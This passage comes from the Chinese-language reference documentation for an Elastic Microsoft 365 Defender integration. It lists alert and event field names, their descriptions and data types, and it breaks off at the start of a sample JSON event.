m365_defender.alert.evidence.url

唯一资源定位器 (URL)。

keyword

m365_defender.alert.evidence.url_count

电子邮件中嵌入的 URL 的数量。

long

m365_defender.alert.evidence.urls

此电子邮件中包含的 URL 的集合。

keyword

m365_defender.alert.evidence.urn

标识群集的自动化调查的统一资源名称 (URN)。

keyword

m365_defender.alert.evidence.user_account.account_name

用户帐户的显示名称。

keyword

m365_defender.alert.evidence.user_account.azure_ad_user_id

Azure AD 中的用户对象标识符。

keyword

m365_defender.alert.evidence.user_account.domain_name

用户所属的 Active Directory 域的名称。

keyword

m365_defender.alert.evidence.user_account.odata_type

keyword

m365_defender.alert.evidence.user_account.user_principal_name

Azure AD 中帐户的用户主体名称。

keyword

m365_defender.alert.evidence.user_account.user_sid

用户帐户的本地安全标识符。

keyword

m365_defender.alert.evidence.verdict

自动化调查得出的结论。可能的值包括:unknown(未知)、suspicious(可疑)、malicious(恶意)、noThreatsFound(未发现威胁)、unknownFutureValue(未知未来值)。

keyword

m365_defender.alert.evidence.version

操作系统平台的版本。

keyword

m365_defender.alert.evidence.vm_metadata.cloud_provider

托管虚拟机的云提供商。可能的值包括:unknown(未知)、azure(Azure)、unknownFutureValue(未知未来值)。

keyword

m365_defender.alert.evidence.vm_metadata.odata_type

keyword

m365_defender.alert.evidence.vm_metadata.resource_id

Azure 资源的唯一标识符。

keyword

m365_defender.alert.evidence.vm_metadata.subscription_id

客户租户所属的 Azure 订阅的唯一标识符。

keyword

m365_defender.alert.evidence.vm_metadata.vm_id

虚拟机实例的唯一标识符。

keyword

m365_defender.alert.first_activity_datetime

与警报关联的最早活动。

date

m365_defender.alert.id

表示警报资源的唯一标识符。

keyword

m365_defender.alert.incident_id

表示此警报资源与之关联的事件的唯一标识符。

keyword

m365_defender.alert.incident_web_url.domain

keyword

m365_defender.alert.incident_web_url.extension

keyword

m365_defender.alert.incident_web_url.fragment

keyword

m365_defender.alert.incident_web_url.full

keyword

m365_defender.alert.incident_web_url.original

keyword

m365_defender.alert.incident_web_url.password

keyword

m365_defender.alert.incident_web_url.path

keyword

m365_defender.alert.incident_web_url.port

long

m365_defender.alert.incident_web_url.query

keyword

m365_defender.alert.incident_web_url.scheme

keyword

m365_defender.alert.incident_web_url.username

keyword

m365_defender.alert.last_activity_datetime

与警报关联的最旧活动。

date

m365_defender.alert.last_update_datetime

在 Microsoft 365 Defender 中上次更新警报的时间。

date

m365_defender.alert.mitre_techniques

与 MITRE ATT&CK 框架对齐的攻击技术。

keyword

m365_defender.alert.odata_type

keyword

m365_defender.alert.provider_alert_id

警报在生成警报的安全提供商产品中显示的 ID。

keyword

m365_defender.alert.recommended_actions

如果生成此警报,应采取的建议响应和修正措施。

keyword

m365_defender.alert.resolved_datetime

解决警报的时间。

date

m365_defender.alert.service_source

创建此警报的服务或产品。可能的值包括:microsoftDefenderForEndpoint、microsoftDefenderForIdentity、microsoftCloudAppSecurity、microsoftDefenderForOffice365、microsoft365Defender、aadIdentityProtection、appGovernance、dataLossPrevention。

keyword

m365_defender.alert.severity

指示对资产的可能影响。严重性越高,影响越大。通常,较高严重性的项目需要最紧急的关注。可能的值包括:unknown(未知)、informational(信息性)、low(低)、medium(中)、high(高)、unknownFutureValue(未知未来值)。

keyword

m365_defender.alert.status

警报的状态。可能的值包括:new(新建)、inProgress(进行中)、resolved(已解决)、unknownFutureValue(未知未来值)。

keyword

m365_defender.alert.tenant_id

创建警报的 Azure Active Directory 租户。

keyword

m365_defender.alert.threat_display_name

与此警报关联的威胁。

keyword

m365_defender.alert.threat_family_name

与此警报关联的威胁家族。

keyword

m365_defender.alert.title

简短的标识字符串值,用于描述警报。

keyword

m365_defender.alert.web_url.domain

keyword

m365_defender.alert.web_url.extension

keyword

m365_defender.alert.web_url.fragment

keyword

m365_defender.alert.web_url.full

keyword

m365_defender.alert.web_url.original

keyword

m365_defender.alert.web_url.password

keyword

m365_defender.alert.web_url.path

keyword

m365_defender.alert.web_url.port

long

m365_defender.alert.web_url.query

keyword

m365_defender.alert.web_url.scheme

keyword

m365_defender.alert.web_url.username

keyword

event
编辑

这是 event 数据集。

导出的字段
字段 描述 类型

@timestamp

事件时间戳。

date

Target.process.command_line

启动进程的完整命令行,包括可执行文件的绝对路径和所有参数。某些参数可能会被过滤以保护敏感信息。

通配符

Target.process.command_line.text

Target.process.command_line 的多字段。

文本

Target.process.executable

进程可执行文件的绝对路径。

keyword

Target.process.executable.text

Target.process.executable 的多字段。

文本

Target.process.name

进程名称。有时也称为程序名称或类似名称。

keyword

Target.process.name.text

Target.process.name 的多字段。

文本

cloud.image.id

云实例的镜像 ID。

keyword

data_stream.dataset

数据流数据集。

constant_keyword

data_stream.namespace

数据流命名空间。

constant_keyword

data_stream.type

数据流类型。

constant_keyword

dll.Ext.size

dll 可执行文件的大小。

long

event.dataset

事件数据集。

constant_keyword

event.module

事件模块。

constant_keyword

host.containerized

主机是否为容器。

布尔值

host.os.build

操作系统构建信息。

keyword

host.os.codename

操作系统代号(如果有)。

keyword

input.type

输入类型

keyword

log.offset

日志偏移

long

m365_defender.event.aad_device_id

Azure AD 中设备的唯一标识符。

keyword

m365_defender.event.account.display_name

在地址簿中显示的帐户用户名。通常是名字或姓名的组合,中间名缩写和姓氏。

keyword

m365_defender.event.account.domain

帐户的域。

keyword

m365_defender.event.account.id

Microsoft Defender for Cloud Apps 找到的帐户标识符。可以是 Azure Active Directory ID、用户主体名称或其他标识符。

keyword

m365_defender.event.account.name

帐户的用户名。

keyword

m365_defender.event.account.object_id

Azure Active Directory 中帐户的唯一标识符。

keyword

m365_defender.event.account.sid

帐户的安全标识符 (SID)。

keyword

m365_defender.event.account.type

用户帐户的类型,指示其一般角色和访问级别,例如普通、系统、管理员、域管理员、系统、应用程序。

keyword

m365_defender.event.account.upn

帐户的用户主体名称 (UPN)。

keyword

m365_defender.event.action.result

操作的结果。

keyword

m365_defender.event.action.trigger

指示操作是由管理员触发(手动或通过批准待处理的自动操作),还是由某些特殊机制触发,例如 ZAP 或动态传递。

keyword

m365_defender.event.action.type

触发事件的活动类型。有关详细信息,请参阅门户内架构参考

keyword

m365_defender.event.action.value

对实体采取的操作。

keyword

m365_defender.event.active_users

事件发生时登录到计算机的所有用户的数组。

keyword

m365_defender.event.activity.objects

记录的活动中涉及的对象列表,例如文件或文件夹。

flattened

m365_defender.event.activity.type

触发事件的活动类型。

keyword

m365_defender.event.additional_fields

有关实体或事件的其他信息,采用 JSON 数组格式。

flattened

m365_defender.event.alert.categories

keyword

m365_defender.event.alert.category

警报识别的威胁指标或违规活动类型。

keyword

m365_defender.event.alert.id

警报的唯一标识符。

keyword

m365_defender.event.app_guard_container_id

Application Guard 用于隔离浏览器活动的虚拟化容器的标识符。

keyword

m365_defender.event.app_instance_id

long

m365_defender.event.application

执行记录的操作的应用程序。

keyword

m365_defender.event.application_id

应用程序的唯一标识符。

keyword

m365_defender.event.asset_value

指示用户分配的设备值。

keyword

m365_defender.event.attachment_count

电子邮件中附件的数量。

long

m365_defender.event.attack_techniques

与触发警报的活动相关的 MITRE ATT&CK 技术。

keyword

m365_defender.event.authentication_details

电子邮件身份验证协议(如 DMARC、DKIM、SPF 或多种身份验证类型 (CompAuth) 的组合)的通过或失败判决列表。

keyword

m365_defender.event.bulk_complaint_level

分配给来自批量邮件发送者的电子邮件的阈值,较高的批量投诉级别 (BCL) 表示电子邮件更有可能产生投诉,因此更有可能是垃圾邮件。

long

m365_defender.event.category

带有AdvancedHunting-前缀的高级搜索表名称。

keyword

m365_defender.event.certificate.countersignature_time

证书被反签名的日期和时间。

date

m365_defender.event.certificate.creation_time

证书创建的日期和时间。

date

m365_defender.event.certificate.expiration_time

证书设置为过期的日期和时间。

date

m365_defender.event.certificate.serial_number

证书颁发机构 (CA) 特有的证书标识符。

keyword

m365_defender.event.city

客户端 IP 地址地理位置所在的城市。

keyword

m365_defender.event.client_version

在计算机上运行的端点代理或传感器的版本。

keyword

m365_defender.event.confidence_level

任何垃圾邮件或网络钓鱼判决的置信级别列表。对于垃圾邮件,此列显示垃圾邮件置信级别 (SCL),指示是否跳过电子邮件 (-1)、发现不是垃圾邮件 (0,1)、发现是中等置信度的垃圾邮件 (5,6) 或发现是高置信度的垃圾邮件 (9)。对于网络钓鱼,此列显示置信级别是“高”还是“低”。

flattened

m365_defender.event.connected_networks

适配器连接到的网络。每个 JSON 数组都包含网络名称、类别(公共、专用或域)、描述以及一个指示是否公共连接到 Internet 的标志。

flattened

m365_defender.event.connectors

定义组织邮件流以及电子邮件的路由方式的自定义说明。

keyword

m365_defender.event.country_code

指示客户端 IP 地址地理位置所在国家/地区的两位字母代码。

keyword

m365_defender.event.crl_distribution_point_urls

列出包含证书和证书吊销列表 (CRL) 的网络共享 URL 的 JSON 数组。

keyword

m365_defender.event.default_gateways

JSON 数组格式的默认网关地址。

keyword

m365_defender.event.delivery.action

电子邮件的传递操作:已传递、已放入垃圾邮件、已阻止或已替换。

keyword

m365_defender.event.delivery.location

电子邮件的传递位置:收件箱/文件夹、本地/外部、垃圾邮件、隔离、失败、已丢弃、已删除邮件。

keyword

m365_defender.event.destination.device_name

运行处理记录的操作的服务器应用程序的设备的名称。

keyword

m365_defender.event.destination.ip_address

运行处理记录的操作的服务器应用程序的设备的 IP 地址。

ip

m365_defender.event.destination.port

相关网络通信或活动的目标端口。

long

m365_defender.event.detection.methods

用于检测电子邮件中或点击时发现的恶意软件、网络钓鱼或其他威胁的方法。

flattened

m365_defender.event.detection.source

识别重要组件或活动的检测技术或传感器。

keyword

m365_defender.event.device.category

将某些设备类型分组到以下类别下的更广泛的分类:端点、网络设备、IoT、未知。

keyword

m365_defender.event.device.id

服务中设备或计算机的唯一标识符。

keyword

m365_defender.event.device.name

设备、计算机或端点的完全限定域名 (FQDN)。

keyword

m365_defender.event.device.sub_type

某些设备类型的其他修饰符,例如,移动设备可以是平板电脑或智能手机;仅当设备发现找到有关此属性的足够信息时才可用。

keyword

m365_defender.event.device.type

基于用途和功能(例如网络设备、工作站、服务器、移动设备、游戏机或打印机)的设备类型。

keyword

m365_defender.event.device_dynamic_tags

使用动态标记规则自动分配的设备标记。

keyword

m365_defender.event.device_manual_tags

使用门户 UI 或公共 API 手动创建的设备标记。

keyword

m365_defender.event.dns.answers

服务器从 DNS 查询返回的答案。

keyword

m365_defender.event.dns.header_flags

2 个字母的 DNS 标头标志的数组。

keyword

m365_defender.event.dns.qclass_name

正在查询的记录的 DNS 类。

keyword

m365_defender.event.dns.qtype_name

正在查询的 DNS 记录类型。

keyword

m365_defender.event.dns.query

DNS 查询。

keyword

m365_defender.event.dns.rcode_name

DNS 响应代码。

keyword

m365_defender.event.dns.ttls

此资源记录可以在被丢弃之前缓存的时间间隔(以秒为单位)。

双精度浮点数

m365_defender.event.dns_addresses

JSON 数组格式的 DNS 服务器地址。

keyword

m365_defender.event.email.action

根据筛选判决、策略和用户操作对电子邮件采取的最终操作:将邮件移至垃圾邮件文件夹、添加 X 标头、修改主题、重定向邮件、删除邮件、发送到隔离区、未采取任何操作、密件抄送邮件。

keyword

m365_defender.event.email.action_policy

生效的操作策略:反垃圾邮件高置信度、反垃圾邮件、反垃圾邮件批量邮件、反垃圾邮件网络钓鱼、反网络钓鱼域模拟、反网络钓鱼用户模拟、反网络钓鱼欺骗、反网络钓鱼图模拟、反恶意软件、安全附件、企业传输规则 (ETR)。

keyword

m365_defender.event.email.action_policy_guid

确定最终邮件操作的策略的唯一标识符。

keyword

m365_defender.event.email.cluster_id

根据其内容的启发式分析进行聚类的类似电子邮件组的标识符。

keyword

m365_defender.event.email.direction

电子邮件相对于您的网络的方向:入站、出站、组织内部。

keyword

m365_defender.event.email.language

检测到的电子邮件内容的语言。

keyword

m365_defender.event.email.subject

电子邮件的主题。

keyword

m365_defender.event.entity_type

对象类型,例如文件、进程、设备或用户。

keyword

m365_defender.event.evidence.direction

指示实体是网络连接的源还是目标。

keyword

m365_defender.event.evidence.role

实体如何参与警报,指示它是受影响的还是仅仅是相关的。

keyword

m365_defender.event.exclusion_reason

指示设备排除的原因。

keyword

m365_defender.event.exposure_level

指示设备的暴露级别。

keyword

m365_defender.event.failure_reason

解释记录的操作失败原因的信息。

keyword

m365_defender.event.file.name

应用记录的操作的文件名称。

keyword

m365_defender.event.file.origin_ip

下载文件的 IP 地址。

ip

m365_defender.event.file.origin_referrer_url

链接到下载文件的网页 URL。

keyword

m365_defender.event.file.origin_url

下载文件的 URL。

keyword

m365_defender.event.file.size

文件大小(以字节为单位)。

long

m365_defender.event.file.type

文件扩展名类型。

keyword

m365_defender.event.folder_path

包含应用记录的操作的文件的文件夹。

keyword

m365_defender.event.initiating_process.account_domain

运行负责事件的进程的帐户的域。

keyword

m365_defender.event.initiating_process.account_name

运行负责事件的进程的帐户的用户名。

keyword

m365_defender.event.initiating_process.account_object_id

运行负责事件的进程的用户帐户的 Azure AD 对象 ID。

keyword

m365_defender.event.initiating_process.account_sid

负责该事件的进程所运行的帐户的安全标识符 (SID)。

keyword

m365_defender.event.initiating_process.account_upn

负责该事件的进程所运行的帐户的用户主体名称 (UPN)。

keyword

m365_defender.event.initiating_process.command_line

用于运行启动事件的进程的命令行。

keyword

m365_defender.event.initiating_process.creation_time

启动事件的进程的启动日期和时间。

date

m365_defender.event.initiating_process.file_name

启动事件的进程的名称。

keyword

m365_defender.event.initiating_process.file_size

运行负责该事件的进程的文件大小。

long

m365_defender.event.initiating_process.folder_path

包含启动事件的进程(映像文件)的文件夹。

keyword

m365_defender.event.initiating_process.id

启动事件的进程的进程 ID (PID)。

long

m365_defender.event.initiating_process.integrity_level

启动事件的进程的完整性级别。Windows 根据某些特征(例如,是否从 Internet 下载启动)为进程分配完整性级别。这些完整性级别会影响对资源的权限。

keyword

m365_defender.event.initiating_process.logon_id

启动事件的进程的登录会话的标识符。此标识符仅在同一计算机的重启之间是唯一的。

keyword

m365_defender.event.initiating_process.md5

启动事件的进程(映像文件)的 MD5 哈希值。

keyword

m365_defender.event.initiating_process.parent_creation_time

负责该事件的进程的父进程的启动日期和时间。

date

m365_defender.event.initiating_process.parent_file_name

生成负责该事件的进程的父进程的名称。

keyword

m365_defender.event.initiating_process.parent_id

生成负责该事件的进程的父进程的进程 ID (PID)。

long

m365_defender.event.initiating_process.sha1

启动事件的进程(映像文件)的 SHA-1 值。

keyword

m365_defender.event.initiating_process.sha256

启动事件的进程(映像文件)的 SHA-256 值。此字段通常未填充,请在可用时使用 SHA1 列。

keyword

m365_defender.event.initiating_process.signature_status

有关启动事件的进程(映像文件)的签名状态的信息。

keyword

m365_defender.event.initiating_process.signer_type

启动事件的进程(映像文件)的文件签名者的类型。

keyword

m365_defender.event.initiating_process.token_elevation

令牌类型,指示应用于启动事件的进程的用户帐户控制 (UAC) 特权提升的存在或缺失。

keyword

m365_defender.event.initiating_process.version_info_company_name

负责该事件的进程(映像文件)的版本信息中的公司名称。

keyword

m365_defender.event.initiating_process.version_info_file_description

负责该事件的进程(映像文件)的版本信息中的描述。

keyword

m365_defender.event.initiating_process.version_info_internal_file_name

负责该事件的进程(映像文件)的版本信息中的内部文件名。

keyword

m365_defender.event.initiating_process.version_info_original_file_name

负责该事件的进程(映像文件)的版本信息中的原始文件名。

keyword

m365_defender.event.initiating_process.version_info_product_name

负责该事件的进程(映像文件)的版本信息中的产品名称。

keyword

m365_defender.event.initiating_process.version_info_product_version

负责该事件的进程(映像文件)的版本信息中的产品版本。

keyword

m365_defender.event.internet_message_id

由发送电子邮件系统设置的电子邮件的面向公众的标识符。

keyword

m365_defender.event.ip_address

用户单击链接的设备的公共 IP 地址或分配给终结点并在相关网络通信期间使用的 IP 地址。

ip

m365_defender.event.ip_addresses

包含分配给适配器的所有 IP 地址及其各自的子网前缀和 IP 地址空间(例如公共、专用或链路本地)的 JSON 数组。

flattened

m365_defender.event.ip_category

有关 IP 地址的其他信息。

keyword

m365_defender.event.ip_tags

应用于特定 IP 地址和 IP 地址范围的客户定义信息。

keyword

m365_defender.event.ipv4_dhcp

DHCP 服务器的 IPv4 地址。

ip

m365_defender.event.ipv6_dhcp

DHCP 服务器的 IPv6 地址。

ip

m365_defender.event.is_admin_operation

指示该活动是否由管理员执行。

布尔值

m365_defender.event.is_anonymous_proxy

指示 IP 地址是否属于已知的匿名代理。

布尔值

m365_defender.event.is_azure_ad_joined

指示计算机是否已加入 Azure Active Directory 的布尔值指示器。

布尔值

m365_defender.event.is_azure_info_protection_applied

指示文件是否已由 Azure 信息保护加密。

布尔值

m365_defender.event.is_clicked_through

指示用户是否能够单击进入原始 URL 或被阻止。

布尔值

m365_defender.event.is_excluded

确定该设备当前是否从 Microsoft Defender 漏洞管理体验中排除。

布尔值

m365_defender.event.is_external_user

指示网络内部的用户是否不属于组织的域。

布尔值

m365_defender.event.is_impersonated

指示该活动是否由一个用户代表另一个(模拟的)用户执行。

布尔值

m365_defender.event.is_internet_facing

指示该设备是否面向 Internet。

布尔值

m365_defender.event.is_local_admin

指示用户是否是计算机上的本地管理员的布尔值指示器。

布尔值

m365_defender.event.is_root_signer_microsoft

指示根证书的签名者是否是 Microsoft,以及文件是否包含在 Windows 操作系统中。

布尔值

m365_defender.event.is_signed

指示文件是否已签名。

布尔值

m365_defender.event.is_trusted

指示文件是否基于 WinVerifyTrust 函数的结果受信任,该函数会检查未知的根证书信息、无效签名、吊销的证书和其他可疑属性。

布尔值

m365_defender.event.isp

与终结点 IP 地址关联的 Internet 服务提供商 (ISP)。

keyword

m365_defender.event.issuer

有关颁发证书颁发机构 (CA) 的信息。

keyword

m365_defender.event.issuer_hash

标识颁发证书颁发机构 (CA) 的唯一哈希值。

keyword

m365_defender.event.join_type

keyword

m365_defender.event.local.ip

通信期间使用的分配给本地设备或计算机的 IP 地址。

ip

m365_defender.event.local.ip_type

IP 地址的类型,例如公共、专用、保留、回送、Teredo、FourToSixMapping 和广播。

keyword

m365_defender.event.local.port

通信期间使用的本地计算机上的 TCP 端口。

long

m365_defender.event.location

与事件关联的城市、国家/地区或其他地理位置。

keyword

m365_defender.event.logon.id

登录会话的标识符。此标识符仅在同一计算机的重启之间是唯一的。

keyword

m365_defender.event.logon.type

登录会话的类型,具体为:交互式、远程交互式 (RDP) 登录、网络、批处理、服务。

keyword

m365_defender.event.mac_address

网络适配器的 MAC 地址。

keyword

m365_defender.event.machine_group

计算机的计算机组。此组由基于角色的访问控制使用,以确定对计算机的访问权限。

keyword

m365_defender.event.md5

已记录操作应用到的文件的 MD5 哈希值。

keyword

m365_defender.event.merged_device_ids

已分配给同一设备的以前的设备 ID。

keyword

m365_defender.event.merged_to_device_id

分配给设备的最新设备 ID。

keyword

m365_defender.event.model

供应商或制造商的产品的型号名称或编号,仅当设备发现找到有关此属性的足够信息时才可用。

keyword

m365_defender.event.network.adapter_name

网络适配器的名称。

keyword

m365_defender.event.network.adapter_status

网络适配器的操作状态。有关可能的值,请参阅此枚举。

keyword

m365_defender.event.network.adapter_type

网络适配器类型。有关可能的值,请参阅此枚举。

keyword

m365_defender.event.network.adapter_vendor

keyword

m365_defender.event.network.message_id

由 Microsoft 365 生成的电子邮件的唯一标识符。

keyword

m365_defender.event.network_direction

DeviceNetworkEvents 中使用的网络方向。

keyword

m365_defender.event.oauth_application_id

keyword

m365_defender.event.object.id

已记录操作应用到的对象的唯一标识符。

keyword

m365_defender.event.object.name

已记录操作应用到的对象的名称。

keyword

m365_defender.event.object.type

已记录操作应用到的对象的类型,例如文件或文件夹。

keyword

m365_defender.event.onboarding_status

指示设备当前是否已加入 Microsoft Defender for Endpoint,或者是否不支持该设备。

keyword

m365_defender.event.operation_name

keyword

m365_defender.event.org_level.action

针对电子邮件采取的操作,以响应在组织级别定义的策略的匹配项。

keyword

m365_defender.event.org_level.policy

触发对电子邮件采取的操作的组织策略。

keyword

m365_defender.event.os.architecture

计算机上运行的操作系统的体系结构。

keyword

m365_defender.event.os.build

计算机上运行的操作系统的内部版本号。

keyword

m365_defender.event.os.distribution

操作系统平台的发行版,例如 Linux 平台的 Ubuntu 或 RedHat。

keyword

m365_defender.event.os.platform

计算机上运行的操作系统的平台。这表示特定的操作系统,包括同一系列中的变体,例如 Windows 11、Windows 10 和 Windows 7。

keyword

m365_defender.event.os.version

计算机上运行的操作系统的版本。

keyword

m365_defender.event.os.version_info

有关操作系统版本的其他信息,例如常用名称、代码名称或版本号。

keyword

m365_defender.event.port

通信期间使用的 TCP 端口。

long

m365_defender.event.previous.file_name

由于操作而被重命名的文件的原始名称。

keyword

m365_defender.event.previous.folder_path

在应用已记录的操作之前,包含文件的原始文件夹。

keyword

m365_defender.event.previous.registry_key

修改之前注册表值的原始注册表项。

keyword

m365_defender.event.previous.registry_value_data

修改之前注册表值的原始数据。

keyword

m365_defender.event.previous.registry_value_name

修改之前注册表值的原始名称。

keyword

m365_defender.event.process.command_line

用于创建新进程的命令行。

keyword

m365_defender.event.process.creation_time

创建进程的日期和时间。

date

m365_defender.event.process.id

新创建进程的进程 ID (PID)。

long

m365_defender.event.process.integrity_level

新创建的进程的完整性级别。Windows 根据某些特征(例如,是否从 Internet 下载启动)为进程分配完整性级别。这些完整性级别会影响对资源的权限。

keyword

m365_defender.event.process.token_elevation

令牌类型,指示应用于新创建的进程的用户帐户控制 (UAC) 特权提升的存在或缺失。

keyword

m365_defender.event.process.version_info_company_name

新创建的进程的版本信息中的公司名称。

keyword

m365_defender.event.process.version_info_file_description

新创建的进程的版本信息中的描述。

keyword

m365_defender.event.process.version_info_internal_file_name

新创建的进程的版本信息中的内部文件名。

keyword

m365_defender.event.process.version_info_original_file_name

新创建的进程的版本信息中的原始文件名。

keyword

m365_defender.event.process.version_info_product_name

新创建的进程的版本信息中的产品名称。

keyword

m365_defender.event.process.version_info_product_version

新创建的进程的版本信息中的产品版本。

keyword

m365_defender.event.protocol

通信期间使用的协议。

keyword

m365_defender.event.public_ip.geo.city_name

keyword

m365_defender.event.public_ip.geo.continent_name

keyword

m365_defender.event.public_ip.geo.country_iso_code

keyword

m365_defender.event.public_ip.geo.country_name

keyword

m365_defender.event.public_ip.geo.location

geo_point

m365_defender.event.public_ip.geo.region_iso_code

keyword

m365_defender.event.public_ip.geo.region_name

keyword

m365_defender.event.public_ip.value

已加入 Microsoft Defender for Endpoint 服务的计算机用于连接的公有 IP 地址。这可能是计算机本身的 IP 地址、NAT 设备或代理的 IP 地址。

ip

m365_defender.event.query.target

正在查询的用户、组、设备、域或任何其他实体类型的名称。

keyword

m365_defender.event.query.type

查询的类型,例如 QueryGroup、QueryUser 或 EnumerateUsers。

keyword

m365_defender.event.query.value

用于运行查询的字符串。

keyword

m365_defender.event.raw_event_data

来自源应用程序或服务的原始事件信息,采用 JSON 格式。

flattened

m365_defender.event.recipient.email_address

收件人的电子邮件地址,或通讯组列表展开后的收件人的电子邮件地址。

keyword

m365_defender.event.recipient.object_id

Azure AD 中电子邮件收件人的唯一标识符。

keyword

m365_defender.event.registry.device_tag

通过注册表添加的计算机标记。

keyword

m365_defender.event.registry.key

记录的操作所应用的注册表项。

keyword

m365_defender.event.registry.value_data

记录的操作所应用的注册表值的数据。

keyword

m365_defender.event.registry.value_name

记录的操作所应用的注册表值的名称。

keyword

m365_defender.event.registry.value_type

记录的操作所应用的注册表值的数据类型,例如二进制或字符串。

keyword

m365_defender.event.remote.device_name

对受影响计算机执行远程操作的计算机的名称。根据报告的事件,此名称可以是完全限定域名 (FQDN)、NetBIOS 名称或不含域信息的主机名。

keyword

m365_defender.event.remote.ip

正在连接到的 IP 地址。

ip

m365_defender.event.remote.ip_type

IP 地址的类型,例如公共、专用、保留、回送、Teredo、FourToSixMapping 和广播。

keyword

m365_defender.event.remote.port

正在连接到的远程设备上的 TCP 端口。

long

m365_defender.event.remote.url

正在连接到的 URL 或完全限定域名 (FQDN)。

keyword

m365_defender.event.report_id

基于重复计数器的事件标识符。若要识别唯一事件,必须将此列与 DeviceName 和 Timestamp 列结合使用。

keyword

m365_defender.event.request.account_domain

用于远程发起活动的帐户的域。

keyword

m365_defender.event.request.account_name

用于远程发起活动的帐户的用户名。

keyword

m365_defender.event.request.account_sid

用于远程发起活动的帐户的安全标识符 (SID)。

keyword

m365_defender.event.request.protocol

用于发起活动的网络协议(如果适用):未知、本地、SMB 或 NFS。

keyword

m365_defender.event.request.source_ip

发起活动的远程设备的 IPv4 或 IPv6 地址。

ip

m365_defender.event.request.source_port

发起活动的远程设备上的源端口。

long

m365_defender.event.sender.display_name

在地址簿中显示的发送者姓名,通常是名字或姓氏、中间名的首字母和姓氏或姓的组合。

keyword

m365_defender.event.sender.from_address

来自 FROM 标头的发件人电子邮件地址,该地址对电子邮件客户端上的电子邮件收件人可见。

keyword

m365_defender.event.sender.from_domain

来自 FROM 标头的发件人域,该域对电子邮件客户端上的电子邮件收件人可见。

keyword

m365_defender.event.sender.ipv4

中继邮件的上次检测到的邮件服务器的 IPv4 地址。

ip

m365_defender.event.sender.ipv6

中继邮件的上次检测到的邮件服务器的 IPv6 地址。

ip

m365_defender.event.sender.mail_from_address

MAIL FROM 标头中的发件人电子邮件地址,也称为信封发件人或返回路径地址。

keyword

m365_defender.event.sender.mail_from_domain

MAIL FROM 标头中的发件人域,也称为信封发件人或返回路径地址。

keyword

m365_defender.event.sender.object_id

发件人在 Azure AD 中的帐户的唯一标识符。

keyword

m365_defender.event.sensitivity.label

应用于电子邮件、文件或其他内容的标签,用于对其进行信息保护分类。

keyword

m365_defender.event.sensitivity.sub_label

应用于电子邮件、文件或其他内容的子标签,用于对其进行信息保护分类;敏感度子标签在敏感度标签下分组,但被视为独立。

keyword

m365_defender.event.sensor_health_state

指示设备的 EDR 传感器的运行状况(如果已加入 Microsoft Defender for Endpoint)。

keyword

m365_defender.event.service_source

提供警报信息的产品或服务。

keyword

m365_defender.event.severity

指示警报标识的威胁指示器或泄露活动可能造成的影响(高、中或低)。

keyword

m365_defender.event.sha1

应用记录操作的文件的 SHA-1。

keyword

m365_defender.event.sha256

应用记录操作的文件的 SHA-256。此字段通常未填充 - 请在可用时使用 SHA1 列。

keyword

m365_defender.event.share_name

包含该文件的共享文件夹的名称。

keyword

m365_defender.event.signature_type

指示签名信息是从文件本身读取为嵌入内容,还是从外部目录文件读取。

keyword

m365_defender.event.signer

有关文件签名者的信息。

keyword

m365_defender.event.signer_hash

标识签名者的唯一哈希值。

keyword

m365_defender.event.subject

电子邮件的主题。

keyword

m365_defender.event.target.account_display_name

应用记录操作的帐户的显示名称。

keyword

m365_defender.event.target.account_upn

应用记录操作的帐户的用户主体名称 (UPN)。

keyword

m365_defender.event.target.device_name

应用记录操作的设备的完全限定域名 (FQDN)。

keyword

m365_defender.event.tenant.id

keyword

m365_defender.event.tenant.name

keyword

m365_defender.event.threat.family

可疑或恶意文件或进程所归类的恶意软件家族。

keyword

m365_defender.event.threat.names

检测到的恶意软件或其他威胁的名称。

keyword

m365_defender.event.threat.types

电子邮件筛选堆栈关于电子邮件是否包含恶意软件、网络钓鱼或其他威胁的判定。

keyword

m365_defender.event.time

Microsoft Defender 收到事件的时间。

date

m365_defender.event.timestamp

记录事件的日期和时间。

date

m365_defender.event.title

警报的标题。

keyword

m365_defender.event.tunnel_type

隧道协议,如果接口用于此目的,例如 6to4、Teredo、ISATAP、PPTP、SSTP 和 SSH。

keyword

m365_defender.event.url

电子邮件主题、正文或附件中的完整 URL。

keyword

m365_defender.event.url_chain

对于涉及重定向的场景,它包括重定向链中存在的 URL。

keyword

m365_defender.event.url_count

电子邮件中嵌入的 URL 的数量。

long

m365_defender.event.url_domain

URL 的域名或主机名。

keyword

m365_defender.event.url_location

keyword

m365_defender.event.user_agent

来自 Web 浏览器或其他客户端应用程序的用户代理信息。

keyword

m365_defender.event.user_agent_tags

Microsoft Defender for Cloud Apps 在用户代理字段的标记中提供的更多信息。可以包含以下任何值:“本机客户端”、“过时的浏览器”、“过时的操作系统”、“机器人”。

keyword

m365_defender.event.user_level_action

根据收件人定义的邮箱策略匹配项对电子邮件采取的操作。

keyword

m365_defender.event.user_level_policy

触发对电子邮件采取的操作的最终用户邮箱策略。

keyword

m365_defender.event.vendor

产品供应商或制造商的名称,仅当设备发现找到有关此属性的足够信息时可用。

keyword

m365_defender.event.workload

用户单击链接的应用程序,值为 Email、Office 和 Teams。

keyword

process.Ext.api.name

keyword

process.Ext.api.parameters.address

目标内存地址。

long

process.Ext.api.parameters.desired_access_numeric

此参数指示传递给 OpenProcessOpenThreadDesiredAccess 字段的数值。

long

process.Ext.api.parameters.protection

页面区域的内存保护。与 MEMORY_BASIC_INFORMATION.Protect 对应。

keyword

process.Ext.api.parameters.size

传递给 API 调用的参数值的大小。

long

process.Ext.token.integrity_level_name

完整性级别,用于确定强制完整性控制 (MIC) 使用的主体的保护或访问级别。

keyword

process.executable

进程可执行文件的绝对路径。

keyword

process.executable.caseless

process.executable 的多字段。

keyword

process.executable.text

process.executable 的多字段。

match_only_text

process.name

进程名称。有时也称为程序名称或类似名称。

keyword

process.name.caseless

process.name 的多字段。

keyword

process.name.text

process.name 的多字段。

match_only_text

process.parent.group_leader.name

keyword

url.user_info

keyword

事件
编辑

这是 事件 数据集。

示例

事件 的示例事件如下所示

{
    "@timestamp": "2021-09-30T09:35:45.113Z",
    "agent": {
        "ephemeral_id": "cd25528a-43c2-4c2b-9dfd-f46ec8044067",
        "id": "d0cc4e5a-22d2-441c-b3e3-b77013785358",
        "name": "elastic-agent-63564",
        "type": "filebeat",
        "version": "8.14.3"
    },
    "cloud": {
        "account": {
            "id": "b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c"
        },
        "provider": [
            "azure"
        ]
    },
    "data_stream": {
        "dataset": "m365_defender.incident",
        "namespace": "13281",
        "type": "logs"
    },
    "ecs": {
        "version": "8.11.0"
    },
